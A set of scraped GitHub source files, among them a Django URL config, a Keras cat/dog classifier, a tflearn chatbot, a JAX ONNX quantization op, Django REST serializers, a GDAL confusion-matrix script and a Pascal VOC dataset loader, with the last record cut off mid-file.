+{"seq_id":"40050917130","text":"\"\"\"\nURL configuration for SEL4C project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import handler404\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom drf_spectacular.views import SpectacularAPIView\nfrom rest_framework import routers\nfrom app1 import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'usuarios', views.UserViewSet)\nrouter.register(r'sesiones', views.SessionViewSet)\nrouter.register(r'preguntas', views.QuestionViewSet)\nrouter.register(r'respuestas', views.SurveyViewSet)\nrouter.register(r'respuestas_detalladas', views.AnswerQuestionViewSet)\nrouter.register(r'entregas', views.DeliverViewSet)\n\n# Our customized 404 error page\nhandler404 = views.pag_404_not_found\n\n# Wire op our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API. \nurlpatterns = [\n path('', views.index, name = 'index'),\n path('contacto/', views.contacto, name = 'contacto'),\n path('registro/', views.register, name = 'registro'),\n path('graficas/', views.graficas, name = 'graficas'),\n path('usuarios/', views.panel_users, name = 'usuarios'),\n path('estadisticas/', views.statistics, name = 'estadisticas'),\n path('login/', views.LoginView.as_view(template_name = 'iniciosesion.html'), name = 'login'),\n path('auth/', views.auth, name = 'auth'),\n path('admin/', admin.site.urls),\n path('api/', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace = 'rest_framework')),\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n path('api/user_data/', views.user_data, name='user_data'),\n path('api/create_user/', views.create_user, name='create_user'),\n path('api/delete_user//', views.delete_user, name='delete_user'),\n path('api/graph-social/', views.global_profile_entrepreneur, name = 'graph social'),\n path('api/graph-thinking/', views.global_profile_thinking, name = 'graph thinking'),\n path('api/unique-graph-social//', views.unique_profile_entrepreneur, name='profile_entrepreneur'),\n path('api/unique-graph-thinking//', views.unique_profile_thinking, name='profile_thinking'),\n path('user_responses/', views.user_responses, name='user_responses'),\n path('UploadFile', views.UploadFile, name='UploadFile'),\n path('simple_upload', views.simple_upload, name='simple_upload'),\n path('logout/', views.logout_user, name = 'logout')\n]\n","repo_name":"AntonioLaurance/SEL4C_BE","sub_path":"SEL4C/SEL4C/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1251895895","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 2 17:28:43 2018\r\n\r\n@author: filipe.luz\r\n\"\"\"\r\n\r\n#Convolutional Neural Network\r\n\r\n#Installing Theano,Tensorflow,Keras\r\n\r\n#Part 1 - Bulding the convolutional neural network\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\n# Initialising the cnn\r\nclassifier = Sequential()\r\n\r\n# Step 1 - Convolution\r\nclassifier.add(Convolution2D(32, 3, 3, \r\n input_shape = 
(64, 64, 3 ),\r\n activation = 'relu'))\r\n\r\n# Step 2 - Pooling\r\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\r\n\r\n\r\nclassifier.add(Convolution2D(32, 3, 3, \r\n activation = 'relu'))\r\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\r\n\r\n\r\n# Step 3 - Flattening\r\nclassifier.add(Flatten())\r\n\r\n# Step 4 - Full Conected Layers\r\n#input\r\nclassifier.add(Dense(output_dim = 128, activation = 'relu'))\r\n#output\r\nclassifier.add(Dense(output_dim = 1, activation = 'sigmoid'))\r\n\r\n# Compiling the CNN\r\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\r\n\r\n#Part 2 - Fitting the CNN to the images\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True)\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntraining_set = train_datagen.flow_from_directory(\r\n 'dataset/training_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\ntest_set = test_datagen.flow_from_directory(\r\n 'dataset/test_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\nclassifier.fit_generator(\r\n training_set,\r\n steps_per_epoch=8000,\r\n epochs=3,\r\n validation_data=test_set,\r\n nb_val_samples=2000)\r\n\r\n\r\n\r\n#Testing new picture to classify\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\ntest_image = image.load_img('C:/Users/filipe.luz/Desktop/Machine Learning A-Z Template Folder/Part 8 - Deep Learning/Section 40 - Convolutional Neural Networks (CNN)/Convolutional_Neural_Networks/dataset/hd_foto.jpg', target_size = (64, 64))\r\ntest_image = image.img_to_array(test_image)\r\ntest_image = np.expand_dims(test_image, axis = 0)\r\nresult = classifier.predict(test_image)\r\n#training_set.class_indices\r\nif result[0][0] == 1:\r\n prediction = 'dog'\r\n print('dog')\r\nelse:\r\n prediction = 'cat'\r\n print('cat')\r\n","repo_name":"FIlipeRBLuz/Data-Science","sub_path":"Convolutional_neural_network_byMe.py","file_name":"Convolutional_neural_network_byMe.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"34886633617","text":"# Task 7: Write a Python program that accepts a string and calculates the number of digits and letters.\n# Sample Data : Python 3.2\n# Expected Output :\n# Letters 6\n# Digits 2\ndef count_letters_and_digits(text):\n letters = 0\n digits = 0\n rest_of_the_stuff = 0\n for char in text:\n if char.isdigit():\n digits += 1\n elif char.isalpha():\n letters += 1\n else:\n rest_of_the_stuff += 1\n print(\n f\"Letters: {letters}\\n\"\n f\"Digits: {digits}\\n\"\n f\"Rest of the stuff(spaces, dots, commas, etc.: {rest_of_the_stuff}\"\n )\n\n\ncount_letters_and_digits(\"Python 3.2\")\n","repo_name":"T6nisValk/School","sub_path":"Basics/Class_4-5_13.05-14.05.23/Tasks 13.05.23/task_7.py","file_name":"task_7.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10669480985","text":"import nltk\r\nimport os\r\nfrom nltk.stem.lancaster import LancasterStemmer \r\nimport numpy\r\nimport tflearn\r\nimport tensorflow as tf\r\nimport random\r\nimport json\r\nimport pickle\r\nstemmer = LancasterStemmer()\r\n\r\n\r\n#start of data preprocessing\r\nclass preProcessing():\r\n def __init__(self):\r\n self.data = 
json.load(open(\"intents.json\")) #Open intents.json file\r\n try:\r\n with open(\"data.pickle\",\"rb\") as f:\r\n self.words, self.labels, self.training, self.output = pickle.load(f) #try to import data if there is a file available\r\n except:\r\n self.words = []\r\n self.labels = []\r\n docs_x = []\r\n docs_y = []\r\n \r\n for intent in self.data[\"intents\"]: #loop through intents\r\n for pattern in intent[\"patterns\"]: #loop through patterns\r\n wrds = nltk.word_tokenize(pattern) #break text into individiual words\r\n self.words.extend(wrds) #wrds list is added to words\r\n docs_x.append(wrds)\r\n docs_y.append(intent[\"tag\"])\r\n \r\n if intent[\"tag\"] not in self.labels:#add label if label in json file is not in label list\r\n self.labels.append(intent[\"tag\"])\r\n\r\n self.words = [stemmer.stem(w.lower()) for w in self.words if w != \"?\"] #get root word, does not get question mark\r\n self.words = sorted(list(set(self.words))) #set makes sure that there are no duplicate words\r\n #list makes words back into list\r\n #sorted sorts the list\r\n self.labels = sorted(self.labels)\r\n self.training = []\r\n self.output = []\r\n out_empty = [0 for _ in range(len(self.labels))]\r\n\r\n for x, doc in enumerate(docs_x):\r\n bag = []\r\n wrds = [stemmer.stem(w) for w in doc]\r\n \r\n for w in self.words:\r\n if w in wrds:\r\n bag.append(1)\r\n else:\r\n bag.append(0)\r\n\r\n output_row = out_empty[:] #create a copy of out_empty\r\n output_row[self.labels.index(docs_y[x])] = 1 #look through labels, set value to 1 if located in labels\r\n\r\n self.training.append(bag) #append bag to training list\r\n self.output.append(output_row)\r\n\r\n self.training = numpy.array(self.training) #turn into numpy array\r\n self.output = numpy.array(self.output) #turn into numpy array\r\n with open(\"data.pickle\",\"wb\") as f:\r\n pickle.dump((self.words, self.labels, self.training, self.output),f) #write all data into a pickle file\r\n \r\n def getTraining(self):\r\n return self.training\r\n def getWords(self):\r\n return self.words\r\n def getLabels(self):\r\n return self.labels\r\n def getOutput(self):\r\n return self.output\r\n def getData(self):\r\n return self.data\r\n#end of data preprocessing\r\n\r\nclass createModel():\r\n def __init__(self,training, output):\r\n tf.reset_default_graph()\r\n net = tflearn.input_data(shape=[None, len(training[0])]) #Find input shape for model\r\n net = tflearn.fully_connected(net, 8) #8 neurons for hidden layer\r\n net = tflearn.fully_connected(net, 8) #another 8 neurons for hidden layer\r\n net = tflearn.fully_connected(net, len(output[0]), activation = \"softmax\") #output layer, get probabilities for each output\r\n net = tflearn.regression(net)\r\n\r\n self.model = tflearn.DNN(net) #create model for training\r\n\r\n try:\r\n self.model.load(\"model.tflearn\") #load model if there is a file available (so that there is no need for retraining)\r\n except:\r\n self.model = tflearn.DNN(net)\r\n self.model.fit(training,output,n_epoch=2000,batch_size=8,show_metric=True) #2000 iterations for learning\r\n self.model.save(\"model.tflearn\") #save model for later use\r\n \r\n def getModel(self):\r\n return self.model\r\n \r\ndef bag_of_words(s,words):\r\n bag=[0 for _ in range(len(words))] #blank bag of words list\r\n s_words = nltk.word_tokenize(s) #list of tokenized words\r\n s_words = [stemmer.stem(word.lower()) for word in s_words] #stem words from s_words list\r\n \r\n for se in s_words:\r\n for i,w in enumerate(words):\r\n if w==se:\r\n bag[i]=1 #change value of 
element in bag to 1 if word in words is equal to word in s_words\r\n \r\n return numpy.array(bag) #return a numpy array from bag\r\n\r\nclass botChat():\r\n def __init__(self):\r\n self.process = preProcessing()\r\n self.model = createModel(self.process.getTraining(),self.process.getOutput())\r\n \r\n def chat(self,inp):\r\n results = self.model.getModel().predict([bag_of_words(inp, self.process.getWords())])[0] #generates probability from input for each of the tags\r\n results_index = numpy.argmax(results) #finds the index of greatest value in the list\r\n tag = self.process.getLabels()[results_index] #returns tag from the index given before\r\n \r\n if results[results_index] >0.9:\r\n for tg in self.process.getData()[\"intents\"]:\r\n if tg['tag'] == tag:\r\n responses = tg['responses'] #get responses from tag\r\n return(random.choice(responses)) #display a random response from list\r\n else:\r\n return(\"I did not understand. Please try to ask another question.\") #asks the user to ask another question if probability is less than 80% \r\n\r\n\"\"\"\r\n#Sample:\r\nstart = botChat()\r\nprint(\"You can now talk with the chatbot!\\nType exit to stop\")\r\nwhile True:\r\n inp = input(\"\\nInput: \")\r\n if inp.lower() == \"exit\":\r\n break\r\n print(start.chat(inp))\r\n\"\"\"\r\n","repo_name":"JerichoLeg/BankOmatic","sub_path":"BLL/Chatbot.py","file_name":"Chatbot.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38544223925","text":"from collections.abc import Callable, Sequence\nimport functools\nimport inspect\nfrom typing import Any\n\nimport jax\nfrom jax import numpy as jnp\nfrom jaxonnxruntime.core import handler\nfrom jaxonnxruntime.core import onnx_node\nfrom jaxonnxruntime.core import onnx_utils\n\nimport onnx\n\n\n@handler.register_op(\"QuantizeLinear\")\nclass QuantizeLinear(handler.Handler):\n \"\"\"Implementation of the ONNX QuantizeLinear operator.\"\"\"\n\n @classmethod\n def _prepare(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any], onnx_jax_impl: Any\n ):\n sig = inspect.signature(onnx_jax_impl)\n kwparams = [\n param.name\n for param in sig.parameters.values()\n if param.kind == inspect.Parameter.KEYWORD_ONLY\n ]\n for name in kwparams:\n node.attrs_dict[name] = node.attrs.get(name, None)\n\n @classmethod\n def version_10(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any]\n ) -> Callable[..., Any]:\n \"\"\"ONNX version_10 QuantizeLinear op.\"\"\"\n cls._prepare(node, inputs, onnx_quantizelinear)\n return onnx_quantizelinear\n\n @classmethod\n def version_13(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any]\n ) -> Callable[..., Any]:\n \"\"\"ONNX version_13 QuantizeLinear op.\"\"\"\n cls._prepare(node, inputs, onnx_quantizelinear)\n return onnx_quantizelinear\n\n @classmethod\n def version_19(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any]\n ) -> Callable[..., Any]:\n \"\"\"ONNX version_19 QuantizeLinear op.\"\"\"\n cls._prepare(node, inputs, onnx_quantizelinear)\n return onnx_quantizelinear\n\n\n@functools.partial(jax.jit, static_argnames=(\"axis\", \"saturate\"))\ndef onnx_quantizelinear(*input_args, axis, saturate):\n \"\"\"https://github.com/onnx/onnx/blob/v1.12.0/docs/Operators.md#QuantizeLinear for more details.\"\"\"\n x, y_scale, zero_point = input_args\n if not axis:\n axis = 1\n if not saturate:\n saturate = True\n\n if len(y_scale.shape) > 1:\n raise RuntimeError(\"Input 2 must be a vector or a number.\")\n if len(y_scale.shape) > 0 
and y_scale.size == 1:\n y_scale = y_scale[0]\n if len(y_scale.shape) > 0:\n new_shape = [1 for _ in x.shape]\n new_shape[axis] = len(y_scale)\n x = x / y_scale.reshape(new_shape)\n else:\n x = x / y_scale\n new_shape = x.shape\n\n if zero_point is not None:\n tensor_type = onnx_utils.np_dtype_to_tensor_dtype(zero_point.dtype)\n\n if tensor_type == onnx.TensorProto.UINT8:\n xi = jnp.rint(x).astype(jnp.int32)\n if len(y_scale.shape) > 0:\n xi += zero_point.reshape(new_shape)\n else:\n xi += zero_point\n dtype = onnx_utils.tensor_dtype_to_jnp_dtype(tensor_type)\n return (jnp.clip(xi, 0, 255).astype(dtype),)\n elif tensor_type == onnx.TensorProto.INT8:\n xi = jnp.rint(x).astype(jnp.int32)\n if len(y_scale.shape) > 0:\n xi += zero_point.reshape(new_shape)\n else:\n xi += zero_point\n dtype = onnx_utils.tensor_dtype_to_jnp_dtype(tensor_type)\n return (jnp.clip(xi, -128, 127).astype(dtype),)\n else:\n raise RuntimeError(\n \"Currently QuantizeLinear implementation does not support dtype\"\n f\" {tensor_type}.zero_point.dtype={zero_point.dtype}.\"\n )\n","repo_name":"google/jaxonnxruntime","sub_path":"jaxonnxruntime/onnx_ops/quantizelinear.py","file_name":"quantizelinear.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"27118887392","text":"from rest_framework import serializers\nfrom .models import Diets, Supplement, Task, Profile, ExerciseCategory, Exercise\nfrom django.contrib.auth.models import User\nfrom rest_framework.validators import UniqueValidator\n\n\n# User Serializer\nclass UserSerializer(serializers.ModelSerializer):\n username = serializers.CharField(validators=[UniqueValidator(queryset=User.objects.all())], min_length=1)\n email = serializers.CharField(max_length=300)\n password = serializers.CharField(min_length=8)\n\n def create(self, validated_data):\n user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])\n return user\n\n class Meta:\n model = User\n fields = ('id', 'username', 'password', 'email', 'is_superuser')\n\n\n# Profile Serializer\nclass ProfileSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n user = UserSerializer(read_only=True)\n first_name = serializers.CharField(required=False, allow_blank=True, default='')\n second_name = serializers.CharField(required=False, allow_blank=True, default='')\n task_count = serializers.IntegerField(required=False, default=0)\n overall_body_test = serializers.FloatField(required=False, default=0)\n allergies = serializers.CharField(required=False, allow_blank=True, default='')\n blood_pressure = serializers.CharField(required=False, allow_blank=True, default='')\n\n class Meta:\n model = Profile\n fields = (\n 'id',\n 'user',\n 'first_name',\n 'second_name',\n 'task_count',\n 'overall_body_test',\n 'allergies',\n 'blood_pressure'\n )\n\n\n# Task Serializer\nclass TaskSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField()\n created_at = serializers.DateTimeField(read_only=True)\n status = serializers.CharField()\n created_by = UserSerializer(read_only=True)\n\n class Meta:\n model = Task\n fields = (\n 'id',\n 'name',\n 'created_at',\n 'status',\n 'created_by'\n )\n\n def create(self, validated_data):\n return Task.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n 
instance.status = validated_data.get('status', instance.status)\n created_by = UserSerializer(read_only=True)\n instance.save()\n return instance\n\n\n# Supplement Serializer\nclass SupplementSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n title = serializers.CharField(required=True)\n description = serializers.CharField(required=False, allow_blank=True, default='')\n\n def create(self, validated_data):\n supplement = Supplement(**validated_data)\n supplement.save()\n return supplement\n\n def update(self, instance, validated_data):\n instance.title = validated_data.get('title', instance.title)\n instance.description = validated_data.get('description', instance.title)\n instance.save()\n return instance\n\n\n# Diet Serializer\nclass DietSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n title = serializers.CharField()\n description = serializers.CharField()\n\n class Meta:\n model = Diets\n fields = (\n 'id',\n 'title',\n 'description'\n )\n\n\n# Exercise Category Serializer\nclass ExerciseCategorySerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField(max_length=255)\n\n class Meta:\n model = ExerciseCategory\n fields = '__all__'\n\n\n# Exercise Serializer\nclass ExerciseSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n title = serializers.CharField(max_length=255)\n photo_link = serializers.CharField(max_length=255)\n equipment_needed = serializers.CharField(max_length=255)\n how_to_do_tips = serializers.CharField(max_length=1500)\n exercise_category = ExerciseCategorySerializer(required=False)\n\n class Meta:\n model = Exercise\n fields = '__all__'\n\n def create(self, validated_data):\n return Exercise.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.title = validated_data.get('title', instance.title)\n instance.photo_link = validated_data.get('photo_link', instance.photo_link)\n instance.equipment_needed = validated_data.get('equipment_needed',instance.equipment_needed)\n instance.how_to_do_tips = validated_data.get('how_to_do_tips', instance.how_to_do_tips)\n instance.save()\n return instance\n","repo_name":"KizatovArman/WebDevProjectEndTerm","sub_path":"WebDevEzTeam/projectenv/backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3138551612","text":"# Script to create a confusion matrix and calculate kappa.\n\nimport csv\nimport os\nimport numpy as np\nfrom sklearn import metrics\nimport skll\nfrom osgeo import gdal\n\nfolder = r'D:\\osgeopy-data\\Utah'\naccuracy_fn = 'accuracy_data.csv'\nmatrix_fn = 'confusion_matrix.csv'\nprediction_fn = r'D:\\osgeopy-data\\Landsat\\Utah\\tree_prediction60.tif'\n\nos.chdir(folder)\n\n# Collect the data needed for the accuracy assessment.\nxys = []\nclasses = []\nwith open(accuracy_fn) as fp:\n reader = csv.reader(fp)\n next(reader)\n for row in reader:\n xys.append([float(n) for n in row[:2]])\n classes.append(int(row[2]))\n\nds = gdal.Open(prediction_fn)\npixel_trans = gdal.Transformer(ds, None, [])\noffset, ok = pixel_trans.TransformPoints(True, xys)\ncols, rows, z = zip(*offset)\n\ndata = ds.GetRasterBand(1).ReadAsArray()\nsample = data[rows, cols]\ndel ds\n\n# Compute kappa.\nprint('Kappa:', skll.kappa(classes, sample))\n\n# Create the confusion matrix.\nlabels = 
np.unique(np.concatenate((classes, sample)))\nmatrix = metrics.confusion_matrix(classes, sample, labels)\n\n# Add labels to the matrix and save it.\nmatrix = np.insert(matrix, 0, labels, 0)\nmatrix = np.insert(matrix, 0, np.insert(labels, 0, 0), 1)\nnp.savetxt(matrix_fn, matrix, fmt='%1.0f', delimiter=',')\n","repo_name":"cgarrard/osgeopy-code","sub_path":"Chapter12/listing12_4.py","file_name":"listing12_4.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"81"} +{"seq_id":"23242358155","text":"# -*- coding: utf-8 -*-\n\nfrom texttable import Texttable\nfrom reader import Reader\nfrom listaSE import ListaSE\nfrom linear_regresion_params import LinearRegresionParams\n\n\nclass Application(object):\n\n def __init__(self):\n self.reader = Reader()\n self.load_data()\n\n x, y = self.get_list_from_data(self.data1)\n self.test1 = LinearRegresionParams(x, y)\n x, y = self.get_list_from_data(self.data2)\n self.test2 = LinearRegresionParams(x, y)\n x, y = self.get_list_from_data(self.data3)\n self.test3 = LinearRegresionParams(x, y)\n x, y = self.get_list_from_data(self.data4)\n self.test4 = LinearRegresionParams(x, y)\n\n self.test1.expected = [-22.55, 1.7279, 0.9545, 0.9111, 644.429]\n self.test2.expected = [-4.039, 0.1681, 0.9333, 0.8711, 60.858]\n self.test3.expected = [-23.92, 1.43097, 0.9631, 0.9276, 528.4294]\n self.test4.expected = [-4.604, 0.140164, 0.9480, 0.8988, 49.4994]\n\n self.results = [self.test1, self.test2, self.test3, self.test4]\n\n def load_data(self):\n '''Load the data needed to test the application\n\n Loads the four test data to be used for compute linear regression\n params.\n\n '''\n self.data1 = self.reader.read_from_file('test_data1.txt')\n self.data2 = self.reader.read_from_file('test_data2.txt')\n self.data3 = self.reader.read_from_file('test_data3.txt')\n self.data4 = self.reader.read_from_file('test_data4.txt')\n\n def get_list_from_data(self, data):\n '''Return the corresponding listX and listY from the passed data.\n\n '''\n _list_x = ListaSE()\n _list_y = ListaSE()\n for line in data:\n x, y = line.split()\n _list_x.add(float(x))\n _list_y.add(float(y))\n return _list_x, _list_y\n\n def draw_table_result(self):\n '''Print a table with the header and rows passed.\n\n '''\n # Imprimir las dos columnas\n header = [['Test', 'Expeceted Values\\nBeta0 | Beta1 | r | r*r | P',\n 'Actual Values\\nBeta0 | Beta1 | r | r*r | P']]\n rows = []\n\n total = 0\n for num, test in enumerate(self.results):\n header.append(\n ['Test {0}'.format(str(num+1)),\n '{0} | {1} | {2} | {3} | {4}'.format(\n test.expected[0], test.expected[1],\n test.expected[2], test.expected[3],\n test.expected[4]),\n '{0} | {1} | {2} | {3} | {4}'.format(\n test.beta0, test.beta1,\n test.correlation_r, test.correlation_r**2,\n test.improved_prediction)])\n rows.append(['', '', '', '', '', total])\n table = Texttable()\n table.set_deco(Texttable.HEADER | Texttable.VLINES | Texttable.HLINES | Texttable.BORDER)\n table.set_cols_align([\"c\", \"c\", \"c\"])\n table.set_cols_valign([\"m\", \"m\", \"m\"])\n table.add_rows(header)\n print(table.draw() + \"\\n\")\n\n # EndClassDefinition\n\n\nif __name__ == \"__main__\":\n print('Welcome to PSP Program3!')\n app = Application()\n 
app.draw_table_result()\n","repo_name":"Sergio2409/PSP-Programs","sub_path":"Programa3/Code/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41978173184","text":"from os.path import join\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef read_files(data_dir, index):\n data_file = join(data_dir, 'data.bin')\n label_file = join(data_dir, 'labels.bin')\n crop_size = 81\n data = np.memmap(data_file, dtype=np.uint8, mode='r', shape=(crop_size, crop_size, 3),\n offset=crop_size * crop_size * 3 * index)\n label = np.memmap(label_file, dtype=np.uint8, mode='r', shape=(1,), offset=index)\n plt.imshow(data)\n plt.title(f\"Traffic light\" if label else f\"Not Traffic light\")\n plt.show(block=True)\n\n\ndef main():\n data_dir = \"../../data/dataset/\"\n\n for index in range(0, 4000, 100):\n read_files(join(data_dir, \"train/\"), index)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zalaznik/mobileye-project","sub_path":"detection_phase2/test_data_preparing.py","file_name":"test_data_preparing.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11290454041","text":"#1. 打印功能提示\nprint(\"=\"*50)\nprint(\" 名片管理系统 V0.01\")\nprint(\" 1. 添加一个新的名片\")\nprint(\" 2. 删除一个名片\")\nprint(\" 3. 修改一个名片\")\nprint(\" 4. 查询一个名片\")\nprint(\" 5. 退出系统\")\nprint(\"=\"*50)\n\n# 用来存储名片\nbusinessCard = []\n\nwhile True:\n function = input(\"请选择一个功能\")\n if function.isnumeric():\n function = int(function)\n # 添加一个新的名片\n if function==1:\n person = {}\n person[\"姓名\"] = input(\"请输入姓名:\")\n person[\"年龄\"] = input(\"请输入年龄:\")\n person[\"性别\"] = input(\"请输入性别:\")\n # person = {\"姓名\":name,\"年龄\":age,\"性别\":sex}\n businessCard.append(person)\n print(businessCard)\n #删除一个名片\n elif function==2:\n name = input(\"请要删除的姓名:\")\n name_flag = 0\n\n for temp in businessCard:\n if temp[\"姓名\"] == name:\n print(\"删除名片%s\",temp[\"姓名\"])\n name_flag = 1\n businessCard.remove(temp)\n break\n\n if name_flag==0:\n print(\"没有找到要删除的人\")\n\n #修改一个名片\n elif function==3:\n name = input(\"请要修改的名片姓名:\")\n name_flag = 0\n\n for temp in businessCard:\n if temp[\"姓名\"] == name:\n print(\"名片%s\",temp[\"姓名\"])\n temp[\"姓名\"] = input(\"请输入姓名:\")\n temp[\"年龄\"] = input(\"请输入年龄:\")\n temp[\"性别\"] = input(\"请输入性别:\")\n name_flag = 1\n break\n\n if name_flag==0:\n print(\"没有找到要修改的人\")\n\n #查询一个名片\n elif function==4:\n name = input(\"请要查询的姓名:\")\n name_flag = 0\n\n for temp in businessCard:\n if temp[\"姓名\"] == name:\n print(temp)\n name_flag = 1\n break\n\n if name_flag==0:\n print(\"查无此人\")\n\n # 退出\n elif function==5:\n print(businessCard)\n\n # 提示异常\n else:\n print(\"输入错误请重新输入!\")\n\n\n","repo_name":"DenChyang/pyDemo","sub_path":"py-base/day03/名片管理系统.py","file_name":"名片管理系统.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"75051188423","text":"import os\nimport cv2\nimport numpy as np\nimport mxnet as mx\nfrom .xmlParser import parseFile\n\n\nclass VOCDataset(mx.gluon.data.Dataset):\n \"\"\"\n Wrapper of HICO Dataset in json file.\n \"\"\"\n voc_class_name = ['__background__', 'person', 'bird', 'cat', 'cow', 'dog', \n 'horse', 'sheep', 'aeroplane', 'bicycle', 'boat', \n 'bus', 'car', 'motorbike', 'train', 'bottle', \n 'chair', 'diningtable', 'pottedplant', 'sofa', 'tvmonitor']\n def 
__init__(self, annotation_dir: str, img_dir: str, dataset_index:str, transform=None, resize_func=None, **kwargs):\n \"\"\"\n Args:\n annotation_dir: a string describing the path of annotation XML files.\n img_dir: a string describing the path of JPEG images.\n dataset_index: filename of a file containing the IDs of all images used to constructing this dataset\n \"\"\"\n super(VOCDataset, self).__init__(**kwargs)\n with open(dataset_index) as f:\n self.dataset_index = [t.strip() for t in f.readlines()]\n self.img_dir = img_dir\n self.annotation_dir = annotation_dir\n self.transform = transform\n self.class_to_id = {}\n self.resize_func = resize_func\n for i, class_name in enumerate(self.voc_class_name):\n self.class_to_id[class_name] = i\n \n def __getitem__(self, idx):\n idx = self.dataset_index[idx]\n img_path = os.path.join(self.img_dir, idx+'.jpg')\n img = cv2.imread(img_path)\n if self.resize_func is not None:\n img, scale = self.resize_func(img)\n else:\n scale = 1\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = np.transpose(img, (2, 0, 1))\n anno_path = os.path.join(self.annotation_dir, idx+'.xml')\n gt = self.convert_gt_into_array(parseFile(anno_path))\n gt[:, 0:4] *= scale\n\n if self.transform is None:\n return img, gt\n else:\n return self.transform(img, gt)\n\n def __len__(self):\n return len(self.dataset_index)\n\n def convert_gt_into_array(self, gt, filter_difficult=True):\n \"\"\"\n Args:\n gt: the ground truth return by parseFile\n filter_difficult: filter out difficult cases or not\n Returns:\n A n * 5 array in the format of [x1, y1, x2, y2, c]\n \"\"\"\n ret = []\n for obj in gt['objects']:\n if filter_difficult and (obj['difficult']==1):\n continue\n new_array = list(obj['bndbox'])\n new_array.append(self.class_to_id[obj['name']])\n ret.append(new_array)\n return np.asarray(ret, dtype=np.float32)\n\n\ndef show_images(data, label, ds:VOCDataset):\n img = np.transpose(data, (1, 2, 0))\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n for item in label:\n cv2.rectangle(img, (int(item[0]), int(item[1])), (int(item[2]), int(item[3])), color=(255, 0, 0), thickness=2)\n cv2.putText(img, ds.voc_class_name[int(item[4])], (int(item[0]), int(item[3])),0, 0.5,(0, 255, 0))\n cv2.imshow(\"Img\", img)\n cv2.waitKey(0)\n","repo_name":"linmx0130/ya_mxdet","sub_path":"VOCDataset/vocDataset.py","file_name":"vocDataset.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"81"} +{"seq_id":"70745201226","text":"from chainercv.datasets import VOCBboxDataset, voc_bbox_label_names\nfrom cv2 import imwrite, rectangle\nimport numpy as np\n\ntrain_dataset = VOCBboxDataset(year='2007', split='train')\nval_dataset = VOCBboxDataset(year='2007', split='val')\ntrainval_dataset = VOCBboxDataset(year='2007', 